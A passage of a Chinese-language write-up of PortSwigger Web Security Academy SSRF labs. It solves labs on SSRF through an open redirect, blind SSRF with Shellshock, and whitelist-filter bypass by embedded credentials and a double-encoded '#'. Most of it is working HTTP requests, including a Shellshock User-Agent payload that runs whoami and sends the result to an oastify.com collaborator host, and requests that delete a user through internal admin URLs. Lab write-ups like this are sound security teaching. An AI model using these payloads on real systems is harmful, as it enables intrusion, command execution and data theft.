Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

使用DnsLog进行验证，发现存在回显，****创建一个利用开放重定向漏洞的URL，重定向到管理界面，并将其输入股票检查器上的stockApi参数：

Get提交参数并不会显示信息，因为重定向到内网了

此时重新回到检查数量功能点，抓包发现请求路径为

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0a0f0008049d3117812cc0eb009f0017.web-security-academy.net
Cookie: session=RvsFc32IvjozAi9Jpn0NpcGGO4j2jiwi; session=8c8YpHoJxmnNr0eT0cYNc7C6ztfCLxn7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a0f0008049d3117812cc0eb009f0017.web-security-academy.net/product?productId=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: https://0a0f0008049d3117812cc0eb009f0017.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=/product/stock/check?productId=3&storeId=1

此时将stockApi的路径替换为存在SSRF的路径

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


POST /product/stock HTTP/2
Host: 0a0f0008049d3117812cc0eb009f0017.web-security-academy.net
Cookie: session=RvsFc32IvjozAi9Jpn0NpcGGO4j2jiwi; session=8c8YpHoJxmnNr0eT0cYNc7C6ztfCLxn7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a0f0008049d3117812cc0eb009f0017.web-security-academy.net/product?productId=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: https://0a0f0008049d3117812cc0eb009f0017.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin
成功访问到内网信息，成功删除用户
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

使用 Shellshock 漏洞的盲 SSRF

题目描述：****本网站使用分析软件，当产品页面加载时，该软件会获取Referer标题中指定的URL。

要解决实验问题，请使用此功能对端口8080上的192.168.0.X范围内的内部服务器执行SSRF盲攻击。在盲目攻击中，对内部服务器使用Shellshock有效负载以泄漏操作系统用户的名称

漏洞点还是存在Http头的Referer字段,发送的bp进行主动扫描，发现UA字段存在外带

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


GET /product?productId=1 HTTP/2
Host: 0a9100de047ed21f812c483700c10016.web-security-academy.net
Cookie: session=6nguy31YigoG8xuNqE55PbrvBqNOMBdQ
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).6ahbphz9r7tozk7rl6y75ygx2o8fw9ky.oastify.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://192.168.0.1:8080
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

在UA头添加以下字段：() { :; }; /usr/bin/nslookup $(whoami).3qu85ef6749lfhno13e4lvwuilocc70w.oastify.com
在存在SSRF的Referer字段添加：https://192.168.0.1:8080，并使用bp模块遍历IP

此时Dnslog成功接收到请求，成功将系统用户名外带出来

具有基于白名单的输入过滤器的 SSRF

实验要求：要解决实验问题：更改库存检查URL以访问管理界面http：//localhost/admin，并删除用户carlos

漏洞点：检查库存

直接修改为自己的Dnslog地址，提示URL只能为stock.weliketoshop.net

将URL改为：http://username@stock.weliketoshop.net/，并观察其是否被接受，结果表明URL解析器支持嵌入式凭据

使用#看是否能够隔断，发现不行，将#号进行两次url编码，成功绕过%2523

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0a9700dc04e82ba08234071c003f00c4.web-security-academy.net
Cookie: session=TSWdg1iN25RFgtSZQ9eqsoXh9qwCZu1s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a9700dc04e82ba08234071c003f00c4.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: https://0a9700dc04e82ba08234071c003f00c4.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos